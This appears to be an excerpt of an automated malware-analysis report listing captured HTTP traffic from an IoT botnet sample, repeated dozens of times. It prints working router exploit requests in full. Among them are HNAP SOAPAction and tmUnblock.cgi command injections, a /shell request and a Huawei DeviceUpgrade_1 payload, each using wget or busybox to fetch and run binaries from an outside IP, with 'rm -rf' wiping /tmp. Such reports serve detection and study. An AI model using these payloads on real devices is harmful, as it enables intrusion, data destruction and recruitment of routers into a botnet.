xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
          Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://109.205.214.35/mips && chmod +x mips;./mips hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://109.205.214.35/mips && chmod +x mips;./mips hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://109.205.214.35/mips && chmod +x mips;./mips hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://109.205.214.35/mips && chmod +x mips;./mips hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wgeData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6d 61 74 72 69 78 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 6d 61 74 72 69 78 3b 20 2f 74 6d 70 2f 2e 6d 61 74 72 69 78 29 3c 2f 4e 65 77 53 74 